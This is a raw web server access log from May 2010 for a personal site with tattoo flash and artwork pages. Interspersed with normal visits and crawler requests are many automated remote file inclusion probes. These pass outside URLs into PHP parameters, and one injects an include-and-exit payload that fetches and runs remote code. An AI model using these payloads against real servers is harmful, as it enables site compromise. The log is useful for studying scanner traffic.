122.149.63.184 - - [02/May/2010:03:06:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:06 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:06 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:06 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:07 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:07 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:07 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:07 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:08 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:08 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:08 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:08 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:07:48 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
210.125.133.87 - - [02/May/2010:03:14:49 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:14:49 -0500] "GET /logs/access_log.1270684800/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:14:49 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:52 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:52 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:52 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:52 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:54 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:54 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:14:54 -0500] "GET /logs/access_log.1270684800/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:09 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:09 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:09 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:15 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:15 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:15 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:21 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:21 -0500] "GET /logs/access_log.1270684800/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:21 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:03:15:30 -0500] "GET /logs/access_log.1270684800%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:40 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:40 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:40 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:41 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:41 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:41 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:43 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:43 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:43 -0500] "GET /logs/access_log.1270684800%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:44 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:44 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.142.75.205 - - [02/May/2010:03:15:51 -0500] "GET //language/errors.php?error=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
174.142.75.205 - - [02/May/2010:03:15:51 -0500] "GET /logs//language/errors.php?error=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.142.75.205 - - [02/May/2010:03:15:51 -0500] "GET /logs/access_log.1224115200//language/errors.php?error=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:15:59 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:16:00 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:16:00 -0500] "GET /logs/access_log.1270684800%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.30.161.241 - - [02/May/2010:03:16:29 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [02/May/2010:03:16:30 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.53 - - [02/May/2010:03:17:25 -0500] "GET /logs/access_log.1224979200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.125.133.87 - - [02/May/2010:03:17:36 -0500] "GET /logs/access_log.1266451200/index1.php?site=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:17:36 -0500] "GET /index1.php?site=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:03:17:39 -0500] "GET /logs/index1.php?site=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.52.143.33 - - [02/May/2010:03:17:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
210.125.133.87 - - [02/May/2010:03:17:55 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:13 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:13 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:13 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:14 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:14 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:14 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:19 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:19 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:19 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:26 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:26 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:18:26 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:03:21:26 -0500] "GET /logs/access_log.1248393600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.39.162 - - [02/May/2010:03:21:58 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:21:58 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:21:58 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:22:04 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:22:04 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:03:22:04 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:30:27 -0500] "GET /logs/access_log.1268611200//?_SERVER[DOCUMENT_ROOT]=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:30:27 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:30:27 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 200 3998 "-""Mozilla/5.0"
207.46.204.241 - - [02/May/2010:03:30:55 -0500] "GET /logs/access_log.1167609600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.8.3.157 - - [02/May/2010:03:37:27 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.8.3.157 - - [02/May/2010:03:37:27 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
61.8.3.157 - - [02/May/2010:03:37:27 -0500] "GET /logs/access_log.1270684800%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:03:38:30 -0500] "GET /logs/access_log.1232496000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.241.190.214 - - [02/May/2010:03:49:45 -0500] "GET /logs//index.php?framefile=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
92.241.190.214 - - [02/May/2010:03:49:45 -0500] "GET //index.php?framefile=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
92.241.190.214 - - [02/May/2010:03:49:45 -0500] "GET /logs/access_log.1268956800//index.php?framefile=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
81.177.33.14 - - [02/May/2010:03:50:13 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:50:13 -0500] "GET /logs/access_log.1219708800//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:50:13 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:50:31 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:50:31 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.177.33.14 - - [02/May/2010:03:50:31 -0500] "GET /logs/access_log.1219708800//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
92.241.190.214 - - [02/May/2010:03:51:19 -0500] "GET /logs/access_log.1229212800//index.php?framefile=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
86.143.13.179 - - [02/May/2010:03:52:40 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.co.uk/url?sa=t&source=web&ct=res&cd=9&ved=0CCYQFjAI&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tattoo+flash&ei=fTvdS7fJO4_40wTZuajABw&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
86.143.13.179 - - [02/May/2010:03:52:40 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
86.143.13.179 - - [02/May/2010:03:52:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
207.46.13.50 - - [02/May/2010:03:53:54 -0500] "GET /logs/access_log.1239753600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.42 - - [02/May/2010:03:55:09 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:03:57:16 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.238 - - [02/May/2010:04:02:54 -0500] "GET /logs/access_log.1225238400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:04:03:34 -0500] "GET /logs/access_log.1165017600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.40 - - [02/May/2010:04:03:37 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.48.245.23 - - [02/May/2010:04:04:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
207.46.204.180 - - [02/May/2010:04:05:55 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.251.224 - - [02/May/2010:04:06:13 -0500] "GET /logs//uigaproxy/include/template.php?content=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.241.251.224 - - [02/May/2010:04:06:13 -0500] "GET //uigaproxy/include/template.php?content=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
212.241.251.224 - - [02/May/2010:04:06:13 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:04:10:57 -0500] "GET //admin/auth.php?xcart_dir=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:04:10:57 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:04:10:57 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:04:10:57 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:04:14:41 -0500] "GET /artwork/txt.htm HTTP/1.0" 200 3880 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:04:21:25 -0500] "GET /logs/access_log.1253059200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.185 - - [02/May/2010:04:21:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.233 - - [02/May/2010:04:21:55 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.95.3.5 - - [02/May/2010:04:23:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.itk-service.eu/bot/id2.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
194.150.236.81 - - [02/May/2010:04:27:36 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:27:37 -0500] "GET /logs/access_log.1263081600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:27:39 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:00 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:00 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:01 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:11 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:28 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:28 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:28:30 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:04:28:42 -0500] "GET /logs/access_log.1199404800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
